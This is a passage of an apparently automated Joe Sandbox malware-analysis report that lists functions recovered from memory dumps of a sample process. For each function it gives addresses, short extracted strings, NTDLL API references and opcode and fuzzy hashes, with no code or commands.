\Vfm, xrefs: 01716177

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: \Vfm$\Vfm
API String ID: 0-1613071310
Opcode ID: 996ff4d3630765eea342e6d9955be60c1ed833e7db969187c558b157d31bd9ed
Instruction ID: adf919453f7c2eccfe4ab0a2e1664fd52df54a8c73ba94fd97b87018cc0189c0
Opcode Fuzzy Hash: 996ff4d3630765eea342e6d9955be60c1ed833e7db969187c558b157d31bd9ed
Instruction Fuzzy Hash: E68148B0E00209CFDF15CFADD9457EDFBB2AF88314F148129E415A7258EBB49885CB91

Function 01716108 Relevance: 2.7, Strings: 2, Instructions: 180
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vfm, xrefs: 017162CA
\Vfm, xrefs: 01716177

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: \Vfm$\Vfm
API String ID: 0-1613071310
Opcode ID: 01af5726836ba6f974718ba37cb9c28c9c472da562f0e3a6896dca0bf6041325
Instruction ID: dc28739319389f6142eabb5cce9a85bd8db01c0b2868346d255515517d166d8a
Opcode Fuzzy Hash: 01af5726836ba6f974718ba37cb9c28c9c472da562f0e3a6896dca0bf6041325
Instruction Fuzzy Hash: B47139B0E042099FDB14DFADC8857DEFBF2BF88714F148129E415AB258EBB49841CB91

Function 01717020 Relevance: 2.6, Strings: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

dLwq, xrefs: 0171709B
Teqq, xrefs: 01717051

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: Teqq$dLwq
API String ID: 0-1696898143
Opcode ID: 1674c964218167406b87ba3212f9ed8fdbf5a8a7e1f08b7de9803aa97f5d473c
Instruction ID: 605a87b8a2c9047ada32e70f57eb33cdcb394b7cfe044ccd01e49f8ee323fd82
Opcode Fuzzy Hash: 1674c964218167406b87ba3212f9ed8fdbf5a8a7e1f08b7de9803aa97f5d473c
Instruction Fuzzy Hash: A2512475B102049FCB48DF69D898AADBBF6FF89710B2540AAE406DB375DB71EC018B40

Function 01718970 Relevance: 1.9, Strings: 1, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fvq, xrefs: 01718A53

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: fvq
API String ID: 0-2471188586
Opcode ID: 226e9ade00a5dbfba5a03b24344a7256b07d2d629ad0d96d45d57956ec07c1ff
Instruction ID: a05a5b93430d6004561475b9e9551dbc24f0136ff45551fc81f448559f81039a
Opcode Fuzzy Hash: 226e9ade00a5dbfba5a03b24344a7256b07d2d629ad0d96d45d57956ec07c1ff
Instruction Fuzzy Hash: 2852BDB4A10319DFDB069BA8E458B9DBBB3FB8C312F108454DD0523794CF396CA1EA65

Function 0171CB98 Relevance: 1.8, Strings: 1, Instructions: 531
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 0171CD78

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: c4653b27cb0b4bc22451b1099b9fd55171c24f09a5a02e6abb23856d612783b5
Instruction ID: fb4a2c45bdfd3013c74b924524e7c1f274ce8bb403f8418b271425b8399b1996
Opcode Fuzzy Hash: c4653b27cb0b4bc22451b1099b9fd55171c24f09a5a02e6abb23856d612783b5
Instruction Fuzzy Hash: 9F320571A00609DFCB25CFADC888A9DFBB1FF88314F148629E4159B659D730E995CF84

Function 01711380 Relevance: 1.6, Strings: 1, Instructions: 322COMMON

Download Yara Rule

Strings

dLwq, xrefs: 017115F3

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: dLwq
API String ID: 0-2885444983
Opcode ID: ce30d0d6d8375f1f68411683b184715cdb49f23c6d445eeb46ba5d2a014eb2d1
Instruction ID: 8eae9e6356b02cc4d862a95a51c9ed3ad7ed7182032c5291f39c08cd6b2cfcd3
Opcode Fuzzy Hash: ce30d0d6d8375f1f68411683b184715cdb49f23c6d445eeb46ba5d2a014eb2d1
Instruction Fuzzy Hash: 10B1D2718493D28FCB039B7898642D8BFF1AF43225F5A44D7C585DF1A7D9284C8AC762

Function 060E0B14 Relevance: 1.6, APIs: 1, Instructions: 70
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 060E0B6C

Memory Dump Source

Source File: 0000000B.00000002.4132706549.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_60e0000_SFHAWxtoIpgL.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 282ad6a9e2f26f636fa12f816c0e878c2ab1c135afa762a9e356fa07f9d40005
Instruction ID: f5e32a07c6ae7191fe1303fe7965dc9997951ef2371b9736744e52bfaa791194
Opcode Fuzzy Hash: 282ad6a9e2f26f636fa12f816c0e878c2ab1c135afa762a9e356fa07f9d40005
Instruction Fuzzy Hash: 4A218E31B002158FCB94DF28D9587AE77F6EB88305F2049A9D402EB398DB758D82CB90

Function 060E0B20 Relevance: 1.6, APIs: 1, Instructions: 65
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 060E0B6C

Memory Dump Source

Source File: 0000000B.00000002.4132706549.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_60e0000_SFHAWxtoIpgL.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f2ea8e13a59a606eb420dfb61256b8d7d8be11412437022ba15bd4350d978bb
Instruction ID: a3929b939bcae1a4070c19b739dc189f4e183daef9937006602e71199e1998a9
Opcode Fuzzy Hash: 4f2ea8e13a59a606eb420dfb61256b8d7d8be11412437022ba15bd4350d978bb
Instruction Fuzzy Hash: 48218E31B001158FCB54DB28C9587AE76F6EB88205F200569D402AB398DF759D82CB90

Function 01715AB4 Relevance: 1.5, Strings: 1, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

\Vfm, xrefs: 01715D77

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: \Vfm
API String ID: 0-3356159168
Opcode ID: 87325959a4b9e81b65950802072995ec7edf2169fbc32f9adcc79659e857e045
Instruction ID: 6166cc3183950977056e99c539f89817523d74dc16987389da4ae43a3f9b6a30
Opcode Fuzzy Hash: 87325959a4b9e81b65950802072995ec7edf2169fbc32f9adcc79659e857e045
Instruction Fuzzy Hash: 48B12C70E002098FDB18CFADC98579DFBF2BF89714F148129D455AB298EB749885CF91

Function 060E0A6A Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 060E0A89

Memory Dump Source

Source File: 0000000B.00000002.4132706549.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_60e0000_SFHAWxtoIpgL.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 81d9536af65d6791d17697242c2dbef6e30f46a4e5e8d0a0c734f5abffc5d8ff
Instruction ID: fad4d4b26b2f981e31ca0c865b334f87260b12fc14ac871d23d8fd6527a9ec83
Opcode Fuzzy Hash: 81d9536af65d6791d17697242c2dbef6e30f46a4e5e8d0a0c734f5abffc5d8ff
Instruction Fuzzy Hash: 94E06D36A80539DFDBA19B98E5546ACFB70FB84321F0A8121C46727604C7B068A6CFC5

Function 060E0A7C Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 060E0A89

Memory Dump Source

Source File: 0000000B.00000002.4132706549.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_60e0000_SFHAWxtoIpgL.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 074242604f8559dce25f95a49f837d063656d547138ddec46e752b0a2e38a7bb
Instruction ID: be684dc0bb73e95a2dcb2e8537feaa4b1738a32b8998ded50defe463560b1977
Opcode Fuzzy Hash: 074242604f8559dce25f95a49f837d063656d547138ddec46e752b0a2e38a7bb
Instruction Fuzzy Hash: 09E04F32980938DFCB64CB84E9542ECB770FB80311F058125C4A767544C77068A6CFC4

Function 0171EB24 Relevance: 1.4, Strings: 1, Instructions: 172COMMON

Download Yara Rule

Strings

4, xrefs: 0171ECB1

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: c375024e270904d35842e88499ce82dcc8674d65cb2b69afd5fe3f486a3c747c
Instruction ID: 94fe224cc426b1127090744c1ce1b7818066c2629dd6e6ffb85839cb16893d3e
Opcode Fuzzy Hash: c375024e270904d35842e88499ce82dcc8674d65cb2b69afd5fe3f486a3c747c
Instruction Fuzzy Hash: 80519D70F012058FCB45EF6CE5489AEBBF2FF88610B188569D9069B369DF349C428B95

Function 01718651 Relevance: 1.4, Strings: 1, Instructions: 136COMMON

Download Yara Rule

Strings

K, xrefs: 017187A7

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: K
API String ID: 0-2299363055
Opcode ID: eea9eec25bf392512cbcabb49c2e8edec83ff1f167478c411b0e67e8bce4fafa
Instruction ID: 655b33f119e639353d25d2cc9a349039999b4b5f2f4cc09efbf7674326ddcec7
Opcode Fuzzy Hash: eea9eec25bf392512cbcabb49c2e8edec83ff1f167478c411b0e67e8bce4fafa
Instruction Fuzzy Hash: 9551B271E0060A8FCB15DFADD54059EFBF2FF98300B248929D816AB35ADB34AC45CB81

Function 0171FD18 Relevance: 1.4, Strings: 1, Instructions: 133COMMON

Download Yara Rule

Strings

PHqq, xrefs: 0171FD26

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: PHqq
API String ID: 0-2246444507
Opcode ID: dc63e52cca4478a4e684cace90f49650980509ebbb4583c33b6d2fdbb2712c10
Instruction ID: cf8a1790f8920700aeebfa43192ad6d26cb96d739526484a2937ea8928b2c393
Opcode Fuzzy Hash: dc63e52cca4478a4e684cace90f49650980509ebbb4583c33b6d2fdbb2712c10
Instruction Fuzzy Hash: DF41DA70A042148FCB10DF7CC9946ADFBF6AF89600F1484AAD816EB35ADB30CC49CB91

Function 01711750 Relevance: 1.4, Strings: 1, Instructions: 115COMMON

Download Yara Rule

Strings

Teqq, xrefs: 01711785

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: Teqq
API String ID: 0-974210879
Opcode ID: 7c2c7897d0c762886f1d120940a8fde914758fa4684a407ab0ed6c329dfbea8a
Instruction ID: d1f312f276f6196830a3f2c2c1f0d8a156be0efe8fc5ac00d3c31d549308ddb2
Opcode Fuzzy Hash: 7c2c7897d0c762886f1d120940a8fde914758fa4684a407ab0ed6c329dfbea8a
Instruction Fuzzy Hash: B5411975B102108FCB44DF29D458A5EBBF6BF89710F25809AE906EF3A6CA71DC01CB90

Function 017115A8 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

dLwq, xrefs: 017115F3

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: dLwq
API String ID: 0-2885444983
Opcode ID: 456b80ccd4776590917f6636dc225dc2fd187b080f2442e54740ace168f4445a
Instruction ID: b3755af7745647b17b335333a9f705aeda66e438810936e4a9b9d26a1c40ef0c
Opcode Fuzzy Hash: 456b80ccd4776590917f6636dc225dc2fd187b080f2442e54740ace168f4445a
Instruction Fuzzy Hash: 7B319E70A002058FDB15CF6DC458AADFBF2BF88300F5889A9E502AF3A6CA759D44CB51

Function 01711BD0 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

LRqq, xrefs: 01711C23

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: LRqq
API String ID: 0-2392378202
Opcode ID: d0732d7bdf4cf0e39e3829c5fb9f6e77d72b66992d4bd411883c05bfe18641bf
Instruction ID: 9f4c4967b10a633c88471080ebf0ec1939db5c95b612035b37020ee2a7d2ed7b
Opcode Fuzzy Hash: d0732d7bdf4cf0e39e3829c5fb9f6e77d72b66992d4bd411883c05bfe18641bf
Instruction Fuzzy Hash: 6D31BB70F002168FCB59AB7D8451ABEBBF6BF89200B544069E506DB3A5EE30DC019791

Function 01711DFD Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

lqvq, xrefs: 01711DA2

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: lqvq
API String ID: 0-1541409306
Opcode ID: 7d72fac667137de8eab81d87d17a0ded1a735cc0bd4878c76d9b1cadd1d0e870
Instruction ID: 8e44e8831a046bc6e6a00be524410de22e205eed2139c8b3999fc6b3ed39a5cf
Opcode Fuzzy Hash: 7d72fac667137de8eab81d87d17a0ded1a735cc0bd4878c76d9b1cadd1d0e870
Instruction Fuzzy Hash: 9821DE30A103158FCF04EFBCE8546ACBBF2EF49211F9009AAD404EB269DB354D85CB91

Function 0171CA18 Relevance: 1.3, Strings: 1, Instructions: 48COMMON

Download Yara Rule

Strings

&?A, xrefs: 0171CA36

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: &?A
API String ID: 0-2592389242
Opcode ID: 0e46bc92733aa63e491e16948ffcac7f7ffe76035ea9be011d881b8675fc3d29
Instruction ID: 78c7bee272e99ca1af5f21244f2e4bbc51c1521b26f9f96f629b7e825750722b
Opcode Fuzzy Hash: 0e46bc92733aa63e491e16948ffcac7f7ffe76035ea9be011d881b8675fc3d29
Instruction Fuzzy Hash: 76019AB0A003108FDB549F59D88475ABBE6FFD8311F108479E90C9F39AEBB59814CBA0

Function 017116D7 Relevance: 1.3, Strings: 1, Instructions: 46COMMON

Download Yara Rule

Strings

Huq, xrefs: 017116D8

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID: Huq
API String ID: 0-93357626
Opcode ID: 7bd5a21ca6c92da4847c3bb8d388521bb31a963159a8c38bb782c0cdef289c54
Instruction ID: b0eacd08dc9152a3dd37e20a39113ad52ec303099bc6516a3ead8c62ce0708cd
Opcode Fuzzy Hash: 7bd5a21ca6c92da4847c3bb8d388521bb31a963159a8c38bb782c0cdef289c54
Instruction Fuzzy Hash: A501D130B083914FC78AA73D541452E7FE2AFCA16036A84EAD14ACF36BDD288C06C361

Function 01711F3F Relevance: .8, Instructions: 788COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57e3f551facc4cecfb66785b2ccc8e6523d1c04c6dea8e94ddeccedeb9320747
Instruction ID: 34c8e3bc34d00413b78359dd4e7db6b5f3109cc52150db112d60276e26ac4f8f
Opcode Fuzzy Hash: 57e3f551facc4cecfb66785b2ccc8e6523d1c04c6dea8e94ddeccedeb9320747
Instruction Fuzzy Hash: B772E0709102198FDBA4EBA4C86479EBBB6FF88301F5040E9D10AAB3A4DF355E85DF51

Function 01711F50 Relevance: .8, Instructions: 780COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65763afc2573891f1f5a6399e225596ea49b7d9b0774eec3b1ce4f80ed96270b
Instruction ID: bc875eb98cabf4e7ca04ce76b43857adccff885ba39bc43c419fd0516c3c52c3
Opcode Fuzzy Hash: 65763afc2573891f1f5a6399e225596ea49b7d9b0774eec3b1ce4f80ed96270b
Instruction Fuzzy Hash: 4472D070A102198FDB94EBA4C86479EBBB6FF88301F5040E9D10AAB394DF355E85DF51

Function 01716385 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0331094a8606a7bb5ff6d97fb6248338350982672eda2d049cc1106409a1a3ce
Instruction ID: 344b9c8ece5b1c28ee9db5161e98227dc3cd635fd2cb41fed8e6e559fe1be6e8
Opcode Fuzzy Hash: 0331094a8606a7bb5ff6d97fb6248338350982672eda2d049cc1106409a1a3ce
Instruction Fuzzy Hash: 5EB16B70E002098FDB10CFACD98579DFBF2AF48714F248529E815A7298EBB49885CB81

Function 0171AB38 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7030a6744256894fefbda24f900aa468cf4b2e9415c27199434567bf3810d578
Instruction ID: 3d8c0f0323fab68d9656e2ca8534ec2af92830641e990b768257730352617895
Opcode Fuzzy Hash: 7030a6744256894fefbda24f900aa468cf4b2e9415c27199434567bf3810d578
Instruction Fuzzy Hash: D881D574F012458FCB06DF78E5A45AEBFB2EF89610B14449AD801973A9EB389C41CF91

Function 0171D598 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9fe680c05a75fc732cee2e9aeafa02002baf230a0ca1b6eecffdf7bff6f1ed08
Instruction ID: f6967f5006325eb824174e6b21161ff9f8bc7ae6ee423a175c2c5a63ecf114e1
Opcode Fuzzy Hash: 9fe680c05a75fc732cee2e9aeafa02002baf230a0ca1b6eecffdf7bff6f1ed08
Instruction Fuzzy Hash: 7661A171B002119FDB15DBBCC544A6EBBF6BF88310F248569D4199B39ADB31EC42CB94

Function 01717E29 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc9ba16f000c76e7a54a118db4c9d19535ddb7cc1e7e9afbf334f3555b64a3b8
Instruction ID: 7275efb7d36702338327898af25ad45a660f6b55abb743c5e3058633b3411b2d
Opcode Fuzzy Hash: fc9ba16f000c76e7a54a118db4c9d19535ddb7cc1e7e9afbf334f3555b64a3b8
Instruction Fuzzy Hash: 9471DB34F1020ACBCB48EFB4F56857EB7B2EB856417508555E8129B398DA389C06DF91

Function 0171AE40 Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c33927108f836d7a63bdbeb47b74a21801f4e910c249eb0482fc1a199f13971
Instruction ID: ac6c8640f5f78a5a5e4f8269924a75175495dad464a293c1afa467453fb1a718
Opcode Fuzzy Hash: 2c33927108f836d7a63bdbeb47b74a21801f4e910c249eb0482fc1a199f13971
Instruction Fuzzy Hash: 26518F70B002058FCB15DF68D484AADFBF2FF88311B148569E91ADB399DB35AC45CB91

Function 01717E38 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba56db26875caba07fb5a1b3fee9af2069e33509724fccd93f200fdd8f9116eb
Instruction ID: dd65a91fb97bd0b44c90d806740e5c91507eba2e15bf412009cb0cb7c72c4ddf
Opcode Fuzzy Hash: ba56db26875caba07fb5a1b3fee9af2069e33509724fccd93f200fdd8f9116eb
Instruction Fuzzy Hash: 5061C834F1020ACBCB48EFB4F56857FB7B2EB856417508965E8129B398DA389C06DF91

Function 0171D2E0 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86728e9a5b870f2faa84e730dcabdf5bd155dfe274889a878f7deba2d1e8b292
Instruction ID: 2a781401f708f63b5ed8bf3ac30875e0cd43c0bab181642c2d49542aaef40c6c
Opcode Fuzzy Hash: 86728e9a5b870f2faa84e730dcabdf5bd155dfe274889a878f7deba2d1e8b292
Instruction Fuzzy Hash: CD519131A105258BCB29CF9CC484AEDFBF2BF84314F598569D846AB64AC734BC80CF90

Function 01717E68 Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 569b765bd7ae30a4b4a4517e5a8320881e8895a646ab0369885bef2f1dc61c4c
Instruction ID: 1ff8611a921bc2fd818d7b1cae9553bf31f112ebb17ecd8b834af2d3e37ba879
Opcode Fuzzy Hash: 569b765bd7ae30a4b4a4517e5a8320881e8895a646ab0369885bef2f1dc61c4c
Instruction Fuzzy Hash: D851D834F1020ACBCB48EFB4F56857FB772EB856417108955E8129B3A8DE389C06DF91

Function 01712F60 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b73c79dee46258649cdc8cb2c9fe75b628c6879e1db3dab0df4474a05248f4e5
Instruction ID: e50ad819b6d5a79286194c259d0e584b137e74887820cd83baa271441b526388
Opcode Fuzzy Hash: b73c79dee46258649cdc8cb2c9fe75b628c6879e1db3dab0df4474a05248f4e5
Instruction Fuzzy Hash: 1C51AD70B102258FCB059B7CE418B5EBAE7EB8C711F148429E90AE7398CF399C419B91

Function 01717E85 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cca6c0d3877099a2bf641a4ec5c5b6de0befe5a2f628bef17ae4a7e3290b5f31
Instruction ID: 1af55028bc244be09655a7d3d1734f74ef4c6670c91c60839f714af5f1f96ee7
Opcode Fuzzy Hash: cca6c0d3877099a2bf641a4ec5c5b6de0befe5a2f628bef17ae4a7e3290b5f31
Instruction Fuzzy Hash: 4251E834F1020ACBCB48EFB4F5A857FB772EB856417108955E8129B3A8DE389C02DF91

Function 0171F058 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 519d63ae09d58766947c91548be5fafe01f4a9dfad20f4e9049e9100f8b24755
Instruction ID: 73877f67814e9f14adc3f4d9d285b7d0f44e80f67d1ebe2e0178e2bd84b91d97
Opcode Fuzzy Hash: 519d63ae09d58766947c91548be5fafe01f4a9dfad20f4e9049e9100f8b24755
Instruction Fuzzy Hash: F5414D31B0021A9FCB05DFA8D9949ADF7F2FF98310B108565D909AF359DB71AD06CB90

Function 01717EA2 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 348cd2f40237da2277360c7095bfc8f8c8243bd841035261f8631610118fb171
Instruction ID: 28130646e27e6f2c6d52a267c36150824ade8bb6013336799918c099536a4529
Opcode Fuzzy Hash: 348cd2f40237da2277360c7095bfc8f8c8243bd841035261f8631610118fb171
Instruction Fuzzy Hash: C051C834F1020ACBCB58EFB4F5A857FB772EB856417508955E8129B3A8DE389C029F91

Function 0171E628 Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4116322515.0000000001710000.00000040.00000800.00020000.00000000.sdmp, Offset: 01710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1710000_SFHAWxtoIpgL.jbxd

Similarity

API ID:
String ID:
API String ID:
